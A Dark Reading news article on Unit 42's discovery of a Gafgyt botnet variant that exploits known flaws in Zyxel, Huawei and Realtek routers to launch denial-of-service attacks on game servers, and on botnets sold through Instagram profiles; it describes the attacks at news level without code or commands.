Dark Reading is part of the Informa Tech Division of Informa PLC

This site is operated by a business or businesses owned by Informa PLC and all copyright resides with them.Informa PLC's registered office is 5 Howick Place, London SW1P 1WG. Registered in England and Wales. Number 8860726.

05:05 PM
Connect Directly

32,000+ WiFi Routers Potentially Exposed to New Gafgyt Variant

Researchers detect an updated Gafgyt variant that targets flaws in small office and home wireless routers from Zyxel, Huawei, and Realtek.

A newly discovered variant of the Gafgyt Internet of Things (IoT) botnet is attempting to infect connected devices, specifically small office and home wireless routers from brands that include Zyxel, Huawei, and Realtek.

Gafgyt was first detected in 2014. Since then, it has become known for large-scale distributed denial-of-service attacks, and its many variants have grown to target a range of businesses across industries. Starting in 2016, researchers with Unit 42 (formerly Zingbox security research) noticed wireless routers are among the most common IoT devices in all organizations and prime targets for IoT botnets.

When a botnet strikes, it can degrade the production network and reputation of a company's IP addresses. Botnets gain access to connected devices by using exploits instead of attempting to log in via unsecured services. As a result, a botnet can more easily spread through IoT devices even if a business's admins have disabled unsecured services and use strong login credentials.

The new Gafgyt variant, detected in September, is a competitor of the JenX botnet. JenX also leverages remote code execution exploits to access and recruit botnets to attack gaming servers, especially those running the Valve Source engine, and launch a denial-of-service (DoS) attack. This Gafgyt variant targets vulnerabilities in three wireless router models, two of which it has in common with JenX. The two share CVE-2017-17215 (in Huawei HG532) and CVE-2014-8361 (in Realtek's RTL81XX chipset). CVE-2017-18368 (in Zyxel P660HN-T1A) is a new addition to Gafgyt.

"Gafgyt was developed off JenX botnet code, which just highlights how much interest there is when it comes to building botnets within that community," says Jen Miller-Osborn, deputy director of threat intelligence at Unit 42. This evolution of Gafgyt indicates a dedicated group of people is working to update these botnets and make them more dangerous, she notes. Most of the time when a botnet is updated, it typically means a new CVE has been added to its lineup.

"The difference with this one is the developers added a new vulnerability to it that wasn't present in the previous one," Miller-Osborn says. "That added to its potential reach." Shodan scans indicate at least 32,000 Wi-Fi routers are potentially vulnerable to these exploits.

Gafgyt uses three "scanners" in an attempt to exploit known remote code execution bugs in the aforementioned routers. These scanners replace the typical "dictionary" attacks employed by other IoT botnets, which typically aim to breach connected devices through unsecured services.

The exploits are designed to work as binary droppers, which pull a corresponding binary from a malicious server depending on the type of device it's trying to infect. The new Gafgyt variant is capable of conducting different types of DoS attacks at the same time, depending on the commands it receives from the command-and-control server, Unit 42 researchers say in a blog post on the findings.

Gafgyt Sets Sights on Gamers
One of the DoS attacks this Gafgyt variant can perform is VSE, which contains a payload to attack game servers running the Valve Source Engine. This is the engine that runs games like Half-Life, Team Fortress 2, and others. Researchers emphasize this isn't an attack on Valve, as anyone can run a server for the games on their own network. This attack targets the servers. 

With the rest of the DoS attack methods, operators are targeting other servers hosting popular games such as Fortnite, Unit 42 found. Miller-Osborn says the purpose in targeting gaming servers is mostly to be an annoyance. "They're not going to make a lot of money doing it," she adds.

While gaming servers have become popular victims, the diversity of IoT devices targeted in these attacks has grown, researchers say. These is nothing about these routers that makes them more likely to be owned by gamers; home users and small businesses are also at risk.

"Once they're compromised, they're used to do malicious activity," Miller-Osborn explains. "The routers themselves could be owned by anyone. The biggest thing, especially with all these IoT malware families, is for people to keep in mind this is probably just going to get worse."

An attack on gaming servers is one thing, she says. It's typically a DoS incident and people aren't getting hurt. However, if an attacker can effectively compromise a router, they can also move into the network and conduct more nefarious activity — for example, data theft.

These attacks highlight the fact that there are a lot of devices, especially routers, active on the Internet and vulnerable to a number of CVEs. The new Gafgyt variant, for example, targets two router vulnerabilities from 2017 and one from 2014, Miller-Osborn points out. "When it comes to routers, you don't necessarily see them getting patched," she notes. Outside the security community, few people will know when they should update their routers or if they've been hit by a botnet — unless, of course, their Internet service provider tells them.

Instagram: New Botnet Market
Cybercriminals are also finding new ways to sell botnets, researchers report. Once an activity limited to the Dark Web, the buying and selling of malware has surfaced to social networks.

In one attack analyzed, the new Gafgyt variant looks for competing botnets on the same device and tries to kill them. It does this by looking for certain keywords and binary names present in other IoT botnet variants. Researchers noticed some strings related to other IoT botnets (Mirai, Hakai, Miori, Satori) and some corresponded to Instagram usernames. The team built some fake profiles and reached out, only to find they're selling botnets in their Instagram profiles.

(Image: Unit 42)

(Image: Unit 42)

Attackers offered the researchers source code for botnets. Unit 42 has contacted Instagram to report these profiles; it also reported malicious sites being used to handle botnet subscriptions. It's "pretty common" for these sales to happen on social media, says Miller-Osborn, and a constant fight for social networks to take down malicious accounts.

"People want to market their devices and services, and one of the easiest ways to do that is on social media," she explains. While it makes things simple for attackers, removing the accounts is "a constant game of whack-a-mole" for social media companies.

Related Content:

This free, all-day online conference offers a look at the latest tools, strategies, and best practices for protecting your organization’s most sensitive data. Click for more information and, to register, here.

Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance & Technology, where she covered financial ... View Full Bio

Comment  | 
Print  | 
More Insights
Newest First  |  Oldest First  |  Threaded View
Mobile Banking Malware Up 50% in First Half of 2019
Kelly Sheridan, Staff Editor, Dark Reading,  1/17/2020
Exploits Released for As-Yet Unpatched Critical Citrix Flaw
Jai Vijayan, Contributing Writer,  1/13/2020
Microsoft to Officially End Support for Windows 7, Server 2008
Kelly Sheridan, Staff Editor, Dark Reading,  1/13/2020
Register for Dark Reading Newsletters
White Papers
Cartoon Contest
Write a Caption, Win a Starbucks Card! Click Here
Latest Comment: This comment is waiting for review by our moderators.
Current Issue
The Year in Security: 2019
This Tech Digest provides a wrap up and overview of the year's top cybersecurity news stories. It was a year of new twists on old threats, with fears of another WannaCry-type worm and of a possible botnet army of Wi-Fi routers. But 2019 also underscored the risk of firmware and trusted security tools harboring dangerous holes that cybercriminals and nation-state hackers could readily abuse. Read more.
Flash Poll
[Just Released] How Enterprises are Attacking the Cybersecurity Problem
[Just Released] How Enterprises are Attacking the Cybersecurity Problem
Organizations have invested in a sweeping array of security technologies to address challenges associated with the growing number of cybersecurity attacks. However, the complexity involved in managing these technologies is emerging as a major problem. Read this report to find out what your peers biggest security challenges are and the technologies they are using to address them.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
PUBLISHED: 2020-01-18
Westermo MRD-315 1.7.3 and 1.7.4 devices have an information disclosure vulnerability that allows an authenticated remote attacker to retrieve the source code of different functions of the web application via requests that lack certain mandatory parameters. This affects ifaces-diag.asp, system.asp, ...
PUBLISHED: 2020-01-18
A memory usage vulnerability exists in Trend Micro Password Manager 3.8 that could allow an attacker with access and permissions to the victim's memory processes to extract sensitive information.
PUBLISHED: 2020-01-18
A RootCA vulnerability found in Trend Micro Password Manager for Windows and macOS exists where the localhost.key of RootCA.crt might be improperly accessed by an unauthorized party and could be used to create malicious self-signed SSL certificates, allowing an attacker to misdirect a user to phishi...
PUBLISHED: 2020-01-18
An arbitrary code execution vulnerability exists in the Trend Micro Security 2019 (v15) consumer family of products which could allow an attacker to gain elevated privileges and tamper with protected services by disabling or otherwise preventing them to start. An attacker must already have administr...
PUBLISHED: 2020-01-18
A Persistent Arbitrary Code Execution vulnerability exists in the Trend Micro Security 2020 (v160 and 2019 (v15) consumer familiy of products which could potentially allow an attacker the ability to create a malicious program to escalate privileges and attain persistence on a vulnerable system.